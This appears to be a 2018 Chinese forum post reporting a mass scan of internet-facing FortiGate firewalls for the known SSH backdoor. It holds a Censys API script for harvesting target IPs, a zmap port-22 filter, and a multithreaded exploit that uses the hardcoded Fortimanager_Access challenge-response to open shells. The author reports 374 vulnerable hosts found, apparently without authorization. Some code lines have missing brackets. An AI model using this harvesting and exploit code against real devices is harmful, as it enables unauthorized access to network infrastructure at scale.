搜索
查看: 2237|回复: 0

飞塔SSH后门 4900台机器样本测试报告

[复制链接]

282

主题

399

帖子

878

积分

vip用户

Rank: 6Rank: 6

积分
878

注册会员活跃会员热心会员

QQ
发表于 2018-8-1 23:09:54 | 显示全部楼层 |阅读模式
测试逻过程1. Censys拉取数据
通过censys拉去了50页面的结果
通过
    • 443.https.tls.certificate.parsed.subject.organizational_unit: FortiGate

关键字
使用官方的api进行拉取,脚本如下:
    • import sys
    • import json
    • import requests
    • API_URL = "https://www.censys.io/api/v1"
    • UID = "0"
    • SECRET = "0"
    • def get(page):
    •     data = {
    •         "query":"443.https.tls.certificate.parsed.subject.organizational_unit: FortiGate",
    •         "page":int(page),
    •         "fields":["ip"
    •     }
    •     res = requests.post(API_URL + "/search/ipv4", data=json.dumps(data), auth=(UID, SECRET)).text
    •    #print res
    •     results = json.loads(res)
    •     for result in results["results"]:
    •         print "%s" % (result["ip"])
    • for i in range(1,50):
    •     get(i)

2. 筛选出开放22端口的ip
原始数据长度:
    • [root@xunzh 8]# cat ip.txt |wc
    •    4900    4900   74466
    • [root@xunzh 8]#

通过zmap进行数据筛选
    • zmap -p 22 --whitelist-file ip.txt -o out.txt

最终剩下
    • [root@xunzh 8]# cat out.txt |wc
    •    1150    1150   16323

3. 对其进行扫描
通过修改原始测试脚本进行测试,添加多线程模块
    • #!/usr/bin/env python
    • # SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7
    • # Usage: ./fgt_ssh_backdoor.py <target-ip>
    • import threading
    • import Queue
    • import socket
    • import select
    • import sys
    • import paramiko
    • from paramiko.py3compat import u
    • import base64
    • import hashlib
    • import termios
    • import tty
    • def custom_handler(title, instructions, prompt_list):
    •     n = prompt_list[0][0
    •     m = hashlib.sha1()
    •     m.update('\x00' * 12)
    •     m.update(n + 'FGTAbc11*xy+Qqz27')
    •     m.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
    •     h = 'AK1' + base64.b64encode('\x00' * 12 + m.digest())
    •     return [h
    • def main(ip):
    •     client = paramiko.SSHClient()
    •     client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    •     try:
    •         client.connect(ip, username='', allow_agent=False, look_for_keys=False)
    •     except paramiko.ssh_exception.SSHException:
    •         pass
    •     trans = client.get_transport()
    •     try:
    •         trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
    •     except paramiko.ssh_exception.AuthenticationException:
    •         pass
    •     trans.auth_interactive(username='Fortimanager_Access', handler=custom_handler)
    •     chan = client.invoke_shell()
    •     oldtty = termios.tcgetattr(sys.stdin)
    •     try:
    •         tty.setraw(sys.stdin.fileno())
    •         tty.setcbreak(sys.stdin.fileno())
    •         chan.settimeout(0.0)
    •         while True:
    •             r, w, e = select.select([chan, sys.stdin], [], [])
    •             if chan in r:
    •                 try:
    •                     x = u(chan.recv(1024))
    •                     if len(x) == 0:
    •                         sys.stdout.write('\r\n*** EOF\r\n')
    •                         break
    •                     print ip+" ok \n"
    •                     break
    •                 except socket.timeout:
    •                     pass
    •     finally:
    •         termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
    • ips=open(sys.argv[1]).read().replace('\r','').split('\n')
    • q=Queue.Queue()
    • for i in ips:
    •     q.put(ips)
    • class mm(threading.Thread):
    •     def __init__(self,queue):
    •         threading.Thread.__init__(self)
    •         self.q=queue
    •     def run(self):
    •         while True:
    •             line=self.q.get()
    •             try:
    •                 main(line)
    •             except:
    •                 pass
    • for i in xrange(10):
    •     mm(q).start()

使用方法:
    • python scan.py input.txt

4. 总结
扫描结果是存在374台漏洞机器,大约站了原始数据的13分之一1,如果按照这个数量来计算,全网大约有5000台以上机器收到影响,将漏洞主机标注在地图上,结果大致如下:

有没有参加CTF比赛的,一起组队啊!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

温馨提示
1:发帖请遵守《中华人民共和国网络安全法》,发帖内容不得维护国家的、集体的、个人的利益。
2:请勿发布恶意攻击他人的技术文章、工具、和使用教程,发现后删帖处理。
3:本站的目的在于让更多的人了解网络安全,避免受到他人的恶意攻击。
4:本站中的部分文章,可能会出现一些“技术类手段”,但这仅仅为学习演示所用,而非恶意传播技术。
5:本站中的部分文章,可能转载自互联网。如有侵权行为,联系我们删除即可。
6:学习仅是充实头脑,切勿恶意攻击个人、企业等。所造成的法律后果一切由自己承担,本站及其站长概不负责。
朕知道了
快速回复 返回顶部 返回列表